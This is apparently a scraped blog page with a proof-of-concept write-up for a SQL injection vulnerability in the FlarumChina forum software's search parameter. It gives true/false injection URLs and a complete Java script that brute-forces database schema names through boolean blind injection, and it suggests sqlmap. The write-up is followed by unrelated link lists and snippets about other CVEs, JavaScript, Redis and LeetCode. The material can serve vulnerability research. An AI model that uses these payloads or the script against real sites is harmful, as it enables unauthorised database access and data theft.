First,We need to download our vulnerable program in GitHub

links:https://github.com/skywalker512/FlarumChina/

Vulnerable versions: <= FlarumChina-beta.7C

When the build is completed, the following image will be displayed

So,The SQL Injection Vulnerability in Search Engine

You just need to visit the following links to make your judgment:

(1).http://127.0.0.1/?q=1%' and 1=1 --+

(2).http://127.0.0.1/?q=1%' and 1=2 --+

So, by returning the different pages mentioned above, we can see that there is a SQL injection vulnerability in this place.

Of course, I also wrote a script in Java to get the database name.

Although not perfect.

Principle:

http://localhost/?q=1%' and substr((select schema_name from information_schema.schemata limit 1,1),1,1)='f' --+

This link is returned when the page is normal.

So use this link to judge in my Java program

Java Poc:

 import java.io.BufferedReader;

 import java.io.FileReader;

 import java.io.IOException;

 import java.io.InputStreamReader;

 import java.net.MalformedURLException;

 import java.net.URL;

 import java.net.URLConnection;

 public class work {

     public static void main(String[] args) throws IOException {

         BufferedReader in = null;

         URL url = null;

         String str = null;

         for(int j=0;j<6;j++) {

             String bm=String.valueOf(j);

             System.out.print(bm+":");

             for (int i=1;i<25;i++) {

                 String cs=String.valueOf(i);

                 in = new BufferedReader(new FileReader("C:\\Users\\DELL\\Desktop\\superdic.txt"));

                 while((str = in.readLine()) != null) {

                     String urlPath = "http://localhost/?q=1%%27%20and%20substr((select%20schema_name%20from%20information_schema.schemata%20limit%20"+bm+",1),"+cs+",1)='"+str+"'%20--+";

                     try {

                         url = new URL(urlPath);

                     } catch (MalformedURLException e) {

                         System.out.println("error:"+cs);

                     }

                     URLConnection conn = url.openConnection();

                     conn.setDoInput(true);

                     BufferedReader br = new BufferedReader(new InputStreamReader(conn.getInputStream()));

                     StringBuilder sb = new StringBuilder();

                     String line = null;

                     while((line = br.readLine()) != null) {

                         sb.append(line);

                     }

                     if(sb.indexOf("http://localhost/d/2") != -1) {

                         if("+".equals(str)) {

                             break;

                         }

                         System.out.print(str);

                         break;

                     }

                 }

                 if("+".equals(str)) {

                     break;

                 }

             }

             System.out.print("\n");

         }

         in.close();

     }

 }

Because I don't know how many databases there are, I'm going to run six for loops for the time being.

So the fifth line returned by the script does not have any output.

You can also use sqlmap directly to obtain of data.

Database:

But most websites are delayed, so script testing is recommended.

FlarumChina SQL injection Vulnerability的更多相关文章

  1. Cacti /graphs_new.php SQL Injection Vulnerability

    catalogue . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 other SQL injection vulnerability ...

  2. DRUPAL-PSA-CORE-2014-005 && CVE-2014-3704 Drupal 7.31 SQL Injection Vulnerability /includes/database/database.inc Analysis

    目录 . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 Use Drupal to build everything from perso ...

  3. Dede(织梦) CMS SQL Injection Vulnerability

    测试方法: @Sebug.net   dis本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负! # Dede Cms All Versions Sql Vulnerability ...

  4. MyBB 18 SQL Injection Vulnerability

    <?php error_reporting(0); ?> <form method="post" action=""> Input a ...

  5. Zabbix 3.0.3 SQL Injection

    Zabbix version 3.0.3 suffers from a remote SQL injection vulnerability. ============================ ...

  6. Portswigger web security academy:SQL injection

    Portswigger web security academy:SQL injection 目录 Portswigger web security academy:SQL injection SQL ...

  7. CVE: 2014-6271、CVE: 2014-7169 Bash Specially-crafted Environment Variables Code Injection Vulnerability Analysis

    目录 . 漏洞的起因 . 漏洞原理分析 . 漏洞的影响范围 . 漏洞的利用场景 . 漏洞的POC.测试方法 . 漏洞的修复Patch情况 . 如何避免此类漏洞继续出现 1. 漏洞的起因 为了理解这个漏 ...

  8. SQL injection

    SQL injection is a code injection technique, used to attack data-driven applications, in which malic ...

  9. ref:Manual SQL injection discovery tips

    ref:https://gerbenjavado.com/manual-sql-injection-discovery-tips/ Manual SQL injection discovery tip ...

随机推荐

  1. 简述JavaScript全局对象

    全局对象是JavaScript中非常重要的一类对象,它作为程序顶层(程序最顶端,不包括在任何函数之内)的上下文存在,JavaScript中的全局属性.全局函数都是通过全局对象来提供给程序的,比如 全局 ...

  2. spring data redis使用1——连接的创建

    spring data redis集成了几个Redis客户端框架,Jedis , JRedis (Deprecated since 1.7), SRP (Deprecated since 1.7) a ...

  3. grep用法【转】

    简介 grep (global search regular expression(RE) and print out the line,全面搜索正则表达式并把行打印出来)是一种强大的文本搜索工具,它 ...

  4. V$SQLAREA

    1.查看消耗资源最多的SQL: SELECT hash_value, executions, buffer_gets, disk_reads, parse_calls FROM V$SQLAREA W ...

  5. 大型NodeJS项目架构与优化

    使用场景: proxy(API冗余,跨域) vue ssr(服务端渲染) socket(大并发,通讯) 区块链(创业公司,新兴行业) 讨论什么? NodeJS异步IO原理及优化方案 NodeJS内存管 ...

  6. rem布局加载闪烁问题

    说明:以下内容来自CSDN,如有侵权,请立刻联系博主(我),我将删除该内容. 原文链接  https://blog.csdn.net/u013778905/article/details/779387 ...

  7. LeetCode(47):全排列 II

    Medium! 题目描述: 给定一个可包含重复数字的序列,返回所有不重复的全排列. 示例: 输入: [1,1,2] 输出: [ [1,1,2], [1,2,1], [2,1,1] ] 解题思路: 这道 ...

  8. laravel 列表搜索查询(when,with用法以及关联图像id处理图像路径)

    laravel中比较常规的列表查询: /** * 活动列表 * @param Request $request * @return \Illuminate\Http\JsonResponse */ p ...

  9. Luogu P2426 【删数】

    状态定义: 一眼区间$DP$,从左右两边删不好定义状态,不如定义$dp[i][j]$表示$[i,j]$未删的最大值,转移就很自然了 转移: 从左边删$dp[i][j]=max(dp[i][j],dp[ ...

  10. 《转》利用cxf实现webservice

    首先下载cxf包,目前最新的版本是apache-cxf-2.1.,下栽地址http://cxf.apache.org/download.html. 1. 首先新建一个web工程CxfService,倒 ...